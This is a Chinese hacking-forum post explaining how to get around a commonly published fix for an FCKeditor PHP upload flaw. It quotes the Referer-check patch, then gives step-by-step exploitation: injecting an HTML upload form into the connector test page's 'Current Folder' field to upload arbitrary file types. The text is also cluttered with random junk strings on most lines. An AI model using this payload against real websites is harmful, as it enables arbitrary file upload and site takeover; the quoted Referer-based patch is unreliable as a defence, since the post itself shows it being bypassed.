找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2273|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php# Q: B7 g8 C3 U# n0 a1 v
网上给出的修复方案是
& X! S+ S. S: w9 O% {修复方法,删除FCK编辑器用其他的编辑器
& N0 X6 k5 @6 {1 G9 I; v" k或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件9 {; B1 T6 z# c/ k7 Z

( R( Q3 d2 M7 J" z+ zrequire(‘config.php’);
' n' [( M4 F! k2 g9 E  s& urequire(‘util.php’);7 `) |  H$ [6 y0 W/ h8 Y
的下面添加以下代码—————————–
0 v) }+ K3 T  F- V0 V$ O//防止外部提交
. {  y9 z9 V- n' mfunction outsidepost()8 l9 c3 \1 V4 g% l7 V( Q) p% |
{3 O; b. p0 X( }$ w
$servername=$_SERVER['SERVER_NAME'];0 c+ ]9 A) G! {5 u8 o8 k
$sub_from=@$_SERVER['HTTP_REFERER'];8 x- g3 M9 d4 `: L1 ~' ?. ?  Q2 _
$sub_len=strlen($servername);
# d8 f4 J1 D$ c6 i; D$checkfrom=substr($sub_from,7,$sub_len);
7 ^; Q7 O$ Z7 D1 J* x2 T) Xif($checkfrom!=$servername){
( N5 k( M4 @& I: [4 k# d  Pecho(“you don’t outsidepost!”);
9 R# ~# H, k1 d3 c- A* {exit;
0 M7 `8 _$ W5 O. n& R}
4 {% y6 G8 F7 U}- d0 E1 Y* o: K8 D* t4 w" W* s7 h
outsidepost();, T7 U6 v' Y& J% @) K9 B+ p
防止外部提交,但是没有防止内部提交,; d# E2 g  m7 ?! O
利用方法:
( d% e4 z* a3 L1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
' K* \8 V% O( X2,在Current Folder 框输入' p1 `1 ~5 o! S* C
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form># g1 [+ E: Q: z2 R  u" h% N  W3 d
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。: g+ y" c6 ~: b% c' B/ ~) c: N" O
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表